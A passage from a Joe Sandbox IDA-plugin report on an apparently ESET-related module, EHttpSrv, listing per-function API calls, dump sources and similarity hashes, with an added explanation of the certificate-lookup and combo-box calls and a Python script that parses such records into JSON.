                                                                                                                • #2651.MFC80U(00000418), ref: 20454FFA
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 20455012
                                                                                                                • #2651.MFC80U(000004DD), ref: 2045501B
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 2045502D
                                                                                                                • #2651.MFC80U(00000419), ref: 2045503B
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 20455053
                                                                                                                • #2651.MFC80U(000004DD), ref: 2045505C
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 2045506E
                                                                                                                • #2651.MFC80U(00000418), ref: 20455077
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 20455089
                                                                                                                • #6232.MFC80U(00000000), ref: 2045508F
                                                                                                                • #6751.MFC80U(00000000,?,00000000), ref: 204550C3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2651MessageSend$#314#6232#6751
                                                                                                                • String ID:
                                                                                                                • API String ID: 2120556010-0
                                                                                                                • Opcode ID: 00c5c4d9388734689ff230a2c2ad7f1d8935393552846ac86e096f6d73856075
                                                                                                                • Instruction ID: 400493f18f7f61b9d9f6c8aa757d2f0e415e25ab5d97b307948fb031a99fd79b
                                                                                                                • Opcode Fuzzy Hash: 00c5c4d9388734689ff230a2c2ad7f1d8935393552846ac86e096f6d73856075
                                                                                                                • Instruction Fuzzy Hash: CC519371384706AFD724DB608C52FAA7BA4AB94F04F50861CF2542F6D0CFB8A805CB95
                                                                                                                APIs
                                                                                                                • #6232.MFC80U(00000001,20459A70,00000000), ref: 20459B84
                                                                                                                • #2651.MFC80U(000003FE), ref: 20459BB5
                                                                                                                • #2155.MFC80U(000003FE), ref: 20459BBC
                                                                                                                • #2651.MFC80U(0000049F,?,000003FE), ref: 20459BC9
                                                                                                                • #2155.MFC80U(0000049F,?,000003FE), ref: 20459BD0
                                                                                                                • #2651.MFC80U(00000479,?,0000049F,?,000003FE), ref: 20459BDD
                                                                                                                • #2155.MFC80U(00000479,?,0000049F,?,000003FE), ref: 20459BE4
                                                                                                                • #2651.MFC80U(000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459BF1
                                                                                                                • #2155.MFC80U(000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459BF8
                                                                                                                • #2651.MFC80U(000004A0,?,000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459C05
                                                                                                                • #2155.MFC80U(000004A0,?,000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459C0C
                                                                                                                • #2651.MFC80U(000004CE,?,000004A0,?,000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459C19
                                                                                                                • #2155.MFC80U(000004CE,?,000004A0,?,000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459C20
                                                                                                                • #2651.MFC80U(000004CF,?,000004CE,?,000004A0,?,000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459C2D
                                                                                                                • #2155.MFC80U(000004CF,?,000004CE,?,000004A0,?,000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459C34
                                                                                                                • #2651.MFC80U(000003F7,?,000004CF,?,000004CE,?,000004A0,?,000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459C41
                                                                                                                • #2155.MFC80U(000003F7,?,000004CF,?,000004CE,?,000004A0,?,000004A1,?,00000479,?,0000049F,?,000003FE), ref: 20459C48
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2155#2651$#6232
                                                                                                                • String ID:
                                                                                                                • API String ID: 793604035-0
                                                                                                                • Opcode ID: f18dba61e3397a45a84501a188c387c4ade9fb1771f5a5cd87d6bd45c25fe1b6
                                                                                                                • Instruction ID: b5f15e1a3d2d9f20017a06a8e2974cef47318a9224f4a602365c315b078bc4fe
                                                                                                                • Opcode Fuzzy Hash: f18dba61e3397a45a84501a188c387c4ade9fb1771f5a5cd87d6bd45c25fe1b6
                                                                                                                • Instruction Fuzzy Hash: EB11A8607C065157D95A23B15C2AFBF15AA8BE2E0CF80C52CB2425FAF0DE6C8D068355
                                                                                                                APIs
                                                                                                                • #3395.MFC80U ref: 2045D1B0
                                                                                                                • GetClientRect.USER32(?,?), ref: 2045D1C5
                                                                                                                • BeginDeferWindowPos.USER32(00000000), ref: 2045D1DB
                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 2045D1F9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$#3395BeginClientRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3239882827-3916222277
                                                                                                                • Opcode ID: fc394b92ffa3647cce4dac8b4896ce4752b666bd29a0a9cdc9c3fc3ebb51db73
                                                                                                                • Instruction ID: 034aadabd89f1504db7cc2445e4d788f2b944d61817344f63716ab64c38942e8
                                                                                                                • Opcode Fuzzy Hash: fc394b92ffa3647cce4dac8b4896ce4752b666bd29a0a9cdc9c3fc3ebb51db73
                                                                                                                • Instruction Fuzzy Hash: 3BC158716047019FC714CF68C984A5ABBF1BF99258F04CA2CF98997755D738EC49CB82
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID: DESC$DWORD$OPTION;OPTNAME=%s$OPTIONS$OPTNAME$SETTINGS$TYPE$VALUE$xXH
                                                                                                                • API String ID: 441403673-3842691247
                                                                                                                • Opcode ID: 44759ae7967cd5d754631de882d4850044f044f1689e997cc1386254ff75ca69
                                                                                                                • Instruction ID: bb8fcba937c8b7826b6e61e985063486853f44c02f1705573b680c95f00d62d2
                                                                                                                • Opcode Fuzzy Hash: 44759ae7967cd5d754631de882d4850044f044f1689e997cc1386254ff75ca69
                                                                                                                • Instruction Fuzzy Hash: 0B71A1B06043009BC320CFA5CD81B5BF7E4AF94A48F40CA2DF999D7391E73DD9958A52
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4026#776$#2310#2311#314#5149#5398#6751
                                                                                                                • String ID: "%s"
                                                                                                                • API String ID: 349887472-3297466227
                                                                                                                • Opcode ID: a16b56dffb77aa759c24ceb2f07e91822a11aa3424924b61ba93bdb9948eb8f5
                                                                                                                • Instruction ID: d2cfaa41a95424281d7d24f1a67dfd6e071f8f898d974065d71e4609338fcf78
                                                                                                                • Opcode Fuzzy Hash: a16b56dffb77aa759c24ceb2f07e91822a11aa3424924b61ba93bdb9948eb8f5
                                                                                                                • Instruction Fuzzy Hash: CE518B71A087019BE310CFA6CC89B5BB7A4FB44319F00CA2DFA46572D1DA79A904DB92
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2045BF06
                                                                                                                • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,00070007,ESET_RootSslCert,00000000), ref: 2045BF4C
                                                                                                                • #310.MFC80U ref: 2045BF6A
                                                                                                                • #310.MFC80U ref: 2045BF78
                                                                                                                • #4026.MFC80U(00000217), ref: 2045BF8A
                                                                                                                • #4026.MFC80U(00000216), ref: 2045BF98
                                                                                                                • #4098.MFC80U(?,?,00000030), ref: 2045BFAA
                                                                                                                • #578.MFC80U(?,?,00000030), ref: 2045BFB5
                                                                                                                • #578.MFC80U ref: 2045BFC2
                                                                                                                • memset.MSVCR80 ref: 2045BFFA
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2045C088
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#4026#578$#314#4098#6751CertCertificateFindStorememset
                                                                                                                • String ID: ESET_RootSslCert$H$Root
                                                                                                                • API String ID: 91189364-3528139168
                                                                                                                • Opcode ID: 0678abf56a7a3d1e0d72c8b167023fc8ff6b7b06c889aa8113efb5d68817ad2b
                                                                                                                • Instruction ID: 50884617386e7d724cd1282ccc776c095777ed97c0775213a395e720bce9dbe1
                                                                                                                • Opcode Fuzzy Hash: 0678abf56a7a3d1e0d72c8b167023fc8ff6b7b06c889aa8113efb5d68817ad2b
                                                                                                                • Instruction Fuzzy Hash: 9A514A70945609EFCB10DFE4CD89BEEBBB4AB18B05F20C229E501B72D0DB795A05DB60
                                                                                                                APIs
                                                                                                                • #4574.MFC80U(FEEA6C22), ref: 20424095
                                                                                                                • #310.MFC80U(FEEA6C22), ref: 204240A2
                                                                                                                • #4026.MFC80U(000000C5), ref: 204240BA
                                                                                                                • SendMessageW.USER32(?,0000014A,00000000,?), ref: 204240D2
                                                                                                                • SendMessageW.USER32(?,0000014A,00000001,?), ref: 2042410D
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 2042413D
                                                                                                                • #6063.MFC80U(20485878), ref: 2042414E
                                                                                                                • #6063.MFC80U(20485878,20485878), ref: 2042415E
                                                                                                                • #310.MFC80U ref: 2042416C
                                                                                                                • #2311.MFC80U(?,2048587C,000000FF), ref: 20424188
                                                                                                                • #6063.MFC80U(?), ref: 2042419C
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 204241E7
                                                                                                                • #6063.MFC80U(20485878), ref: 204241F8
                                                                                                                • #578.MFC80U ref: 20424209
                                                                                                                • #578.MFC80U ref: 20424222
                                                                                                                • SendMessageW.USER32(?,0000014E,00000001,00000000), ref: 20424256
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#6063$#310#578$#2311#4026#4574
                                                                                                                • String ID:
                                                                                                                • API String ID: 41856079-0
                                                                                                                • Opcode ID: 1edb12446993ca98173a7668d1f0b0277ab47e324ba7c68fac4df549d923e01e
                                                                                                                • Instruction ID: 687126907702a7e443bdc3775094fafe2b3e18f5a04f559aed56f15db4042a3c
                                                                                                                • Opcode Fuzzy Hash: 1edb12446993ca98173a7668d1f0b0277ab47e324ba7c68fac4df549d923e01e
                                                                                                                • Instruction Fuzzy Hash: 3D5123316086459FD724CF60CC84FAB77A9FB94309F40CA2CF945576E0DB799904CB52
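The records above are the per-function output of the Joe Sandbox IDA plugin for the module dumped at 0x20400000 (snapshot hcaresult_6_2_20400000_EHttpSrv.jbxd): each one lists the resolved calls with their arguments and return-site address, the memory-dump source it was lifted from, and the similarity hashes. Triage is easier once the listing is structured and the hex arguments are decoded. Two records here are worth reading that way: in CertFindCertificateInStore(00000000,00010001,00000000,00070007,ESET_RootSslCert,00000000) the encoding 0x00010001 is X509_ASN_ENCODING|PKCS_7_ASN_ENCODING and dwFindType 0x00070007 is CERT_FIND_SUBJECT_STR_A, so the function searches a store (the String ID names "Root") for a certificate whose subject contains "ESET_RootSslCert"; and in the SendMessageW record the messages 0x014A and 0x014E are CB_INSERTSTRING and CB_SETCURSEL, i.e. a combo box being filled and preselected in a dialog. The parser below is an added example, not Joe Sandbox or ESET code; its SAMPLE input is constructed from lines on this page (trimmed, with the "Part of subcall function" line placed in the second record for illustration), and the "Download File" suffix it strips is the link text that the HTML export fuses onto the Associated lines.

```python
"""Parse Joe Sandbox 'IDA Plugin' function records into dicts and decode a few
Win32 constants that appear in their argument lists. Added example, not Joe
Sandbox or ESET code. SAMPLE is constructed from lines on this page (trimmed)."""
import json
import re
from typing import Dict, List, Optional

SAMPLE = """APIs
• CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,00070007,ESET_RootSslCert,00000000), ref: 2045BF4C
• #310.MFC80U ref: 2045BF6A
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #310#4026#578$#314#4098#6751CertCertificateFindStorememset
• String ID: ESET_RootSslCert$H$Root
• API String ID: 91189364-3528139168
• Instruction Fuzzy Hash: 9A514A70945609EFCB10DFE4CD89BEEBBB4AB18B05F20C229E501B72D0DB795A05DB60
APIs
• SendMessageW.USER32(?,0000014A,00000000,?), ref: 204240D2
• SendMessageW.USER32(?,0000014E,00000001,00000000), ref: 20424256
  • Part of subcall function 2045D0A0: GetParent.USER32(?), ref: 2045D0B0
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
Similarity
• API ID: MessageSend$#6063$#310#578$#2311#4026#4574
• API String ID: 41856079-0
• Instruction Fuzzy Hash: 3D5123316086459FD724CF60CC84FAB77A9FB94309F40CA2CF945576E0DB799904CB52
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally marked as a subcall.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
SRC_RE = re.compile(r"^•\s*Source File:\s*(?P<file>[^,\s]+),\s*Offset:\s*(?P<off>[0-9A-F]{8}),"
                    r"\s*based on PE:\s*(?P<pe>true|false)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

# Constants from wincrypt.h / winuser.h for the calls that matter in these records.
CERT_ENCODING = {0x00000001: "X509_ASN_ENCODING", 0x00010000: "PKCS_7_ASN_ENCODING"}
CERT_FIND = {0x00070007: "CERT_FIND_SUBJECT_STR_A", 0x00080007: "CERT_FIND_SUBJECT_STR_W"}
CB_MSG = {0x0143: "CB_ADDSTRING", 0x0147: "CB_GETCURSEL", 0x014A: "CB_INSERTSTRING", 0x014E: "CB_SETCURSEL"}


def hexval(s: str) -> Optional[int]:
    """Joe Sandbox prints unresolved arguments as '?' and string arguments verbatim."""
    try:
        return int(s, 16)
    except ValueError:
        return None


def annotate(call: Dict) -> Dict[str, str]:
    """Decode the arguments of the two API calls discussed above."""
    args, out = call["args"], {}
    if call["name"] == "CertFindCertificateInStore" and len(args) >= 5:
        enc, find = hexval(args[1]), hexval(args[3])
        if enc is not None:
            out["dwCertEncodingType"] = "|".join(n for b, n in CERT_ENCODING.items() if enc & b) or hex(enc)
        if find is not None:
            out["dwFindType"] = CERT_FIND.get(find, hex(find))
        out["pvFindPara"] = args[4]
    elif call["name"] in ("SendMessageW", "SendMessageA") and len(args) >= 2:
        msg = hexval(args[1])
        if msg is not None:
            out["Msg"] = CB_MSG.get(msg, hex(msg))
    return out


def _new_record() -> Dict:
    return {"apis": [], "strings": [], "source_file": None, "offset": None,
            "based_on_pe": None, "associated": [], "meta": {}, "similarity": {}}


def parse_records(text: str) -> List[Dict]:
    """One record per function; a record ends at its 'Instruction Fuzzy Hash' line."""
    records: List[Dict] = []
    cur, section = _new_record(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        m = API_RE.match(line)
        if section == "APIs" and m:
            args = m["args"].split(",") if m["args"] else []
            call = {"name": m["name"], "module": m["module"], "args": args,
                    "ref": m["ref"], "subcall_of": m["parent"]}
            call["decoded"] = annotate(call)
            cur["apis"].append(call)
            continue
        if section == "Strings":
            cur["strings"].append(line)
            continue
        m = SRC_RE.match(line)
        if m:
            cur["source_file"], cur["offset"], cur["based_on_pe"] = m["file"], m["off"], m["pe"] == "true"
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        key, val = m["key"].strip(), m["val"].strip()
        if key == "Associated":  # drop the link text the HTML export fuses onto the file name
            if val.endswith("Download File"):
                val = val[:-len("Download File")].strip()
            cur["associated"].append(val)
        elif section == "Similarity":
            cur["similarity"][key] = val
            if key == "Instruction Fuzzy Hash":  # last line of every record
                records.append(cur)
                cur = _new_record()
        else:
            cur["meta"][key] = val
    if cur["apis"] or cur["similarity"]:  # trailing record that lost its hash line
        records.append(cur)
    return records


def string_ids(record: Dict) -> List[str]:
    """'String ID' is the $-joined list of strings the function references."""
    return [s for s in record["similarity"].get("String ID", "").split("$") if s]


def calls_named(records: List[Dict], name: str) -> List[Dict]:
    return [c for r in records for c in r["apis"] if c["name"] == name]


if __name__ == "__main__":
    print(json.dumps(parse_records(SAMPLE), indent=1))
```

Running the script prints both records as JSON; in practice you feed it the text of the whole "Joe Sandbox IDA Plugin" section and then pivot on calls_named(records, "CertFindCertificateInStore") or on string_ids() to find every function that touches a given string, which is considerably faster than scrolling the listing.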
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(000003E8,?,?,00000001,?,20478DBB,00000001,?,?,20498100,00000010,20478E87,?), ref: 20478BEE
                                                                                                                • InterlockedCompareExchange.KERNEL32(204A57F4,?,00000000), ref: 20478BF7
                                                                                                                • _amsg_exit.MSVCR80 ref: 20478C15
                                                                                                                • _initterm_e.MSVCR80 ref: 20478C30
                                                                                                                • _initterm.MSVCR80 ref: 20478C4C
                                                                                                                • InterlockedExchange.KERNEL32(204A57F4,00000000), ref: 20478C61
                                                                                                                • Sleep.KERNEL32(000003E8,?,?,00000001,?,20478DBB,00000001,?,?,20498100,00000010,20478E87,?), ref: 20478CB2
                                                                                                                • InterlockedCompareExchange.KERNEL32(204A57F4,00000001,00000000), ref: 20478CBC
                                                                                                                • _amsg_exit.MSVCR80 ref: 20478CCE
                                                                                                                • _decode_pointer.MSVCR80(?,?,00000001,?,20478DBB,00000001,?,?,20498100,00000010,20478E87,?), ref: 20478CE2
                                                                                                                • _decode_pointer.MSVCR80(?,00000001,?,20478DBB,00000001,?,?,20498100,00000010,20478E87,?), ref: 20478CF1
                                                                                                                • _encoded_null.MSVCR80(00000001,?,20478DBB,00000001,?,?,20498100,00000010,20478E87,?), ref: 20478D03
                                                                                                                • _decode_pointer.MSVCR80(?,?,20478DBB,00000001,?,?,20498100,00000010,20478E87,?), ref: 20478D13
                                                                                                                • free.MSVCR80 ref: 20478D20
                                                                                                                • _encoded_null.MSVCR80(?,20498100,00000010,20478E87,?), ref: 20478D27
                                                                                                                • InterlockedExchange.KERNEL32(204A57F4,00000000), ref: 20478D44
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExchangeInterlocked$_decode_pointer$CompareSleep_amsg_exit_encoded_null$_initterm_initterm_efree
                                                                                                                • String ID:
                                                                                                                • API String ID: 2174737765-0
                                                                                                                • Opcode ID: e17a9ff4fe9a01e9f66dbe4c43903dcfb7005e81e7626672a228798f566fa08a
                                                                                                                • Instruction ID: 182727d0421b49ffdac12668d794a1d59ea721c2da4f447e0c6feb1164b7796b
                                                                                                                • Opcode Fuzzy Hash: e17a9ff4fe9a01e9f66dbe4c43903dcfb7005e81e7626672a228798f566fa08a
                                                                                                                • Instruction Fuzzy Hash: E641C175549601EFD2119FA0CD84EA97BB5EB1470AF20C82EF901966B2CF7C9C44EAA1
                                                                                                                APIs
                                                                                                                • #4574.MFC80U ref: 204601A5
                                                                                                                • GetClientRect.USER32(?,?), ref: 204601B3
                                                                                                                • #2651.MFC80U(000004C6,0000000F), ref: 204601E4
                                                                                                                  • Part of subcall function 2045D0A0: GetParent.USER32(?), ref: 2045D0B0
                                                                                                                  • Part of subcall function 2045D0A0: #2366.MFC80U(00000000), ref: 2045D0B7
                                                                                                                  • Part of subcall function 2045D0A0: #4109.MFC80U(00000000,02000000,00000000), ref: 2045D0D7
                                                                                                                  • Part of subcall function 2045D0A0: GetClientRect.USER32(?,?), ref: 2045D0F1
                                                                                                                  • Part of subcall function 2045D0A0: GetWindowRect.USER32(?,00000000), ref: 2045D116
                                                                                                                  • Part of subcall function 2045D0A0: #5609.MFC80U(00000000), ref: 2045D123
                                                                                                                  • Part of subcall function 2045D0A0: malloc.MSVCR80 ref: 2045D12A
                                                                                                                  • Part of subcall function 2045D0A0: #5713.MFC80U(?,00000000), ref: 2045D177
                                                                                                                • #2651.MFC80U(00000428,00000009,000004C6,0000000F), ref: 204601F9
                                                                                                                • #2651.MFC80U(00000499,00000009,00000428,00000009,000004C6,0000000F), ref: 2046020E
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 2046023C
                                                                                                                • #2364.MFC80U(00000000), ref: 2046023F
                                                                                                                • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 20460254
                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 20460268
                                                                                                                • #3869.MFC80U(00000000,20485878,00000000,00000019,000000FF), ref: 2046027F
                                                                                                                • #3869.MFC80U(00000001,20486940,00000000,000000C8,000000FF,00000000,20485878,00000000,00000019,000000FF), ref: 20460296
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 204602AB
                                                                                                                • #2651.MFC80U(00000428,00000000), ref: 204602BF
                                                                                                                • #2155.MFC80U(00000428,00000000), ref: 204602C6
                                                                                                                • #2651.MFC80U(00000499,00000000,00000428,00000000), ref: 204602D4
                                                                                                                • #2155.MFC80U(00000499,00000000,00000428,00000000), ref: 204602DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2651$MessageSend$Rect$#2155#3869Client$#2364#2366#4109#4574#5609#5713ParentWindowmalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1725614514-0
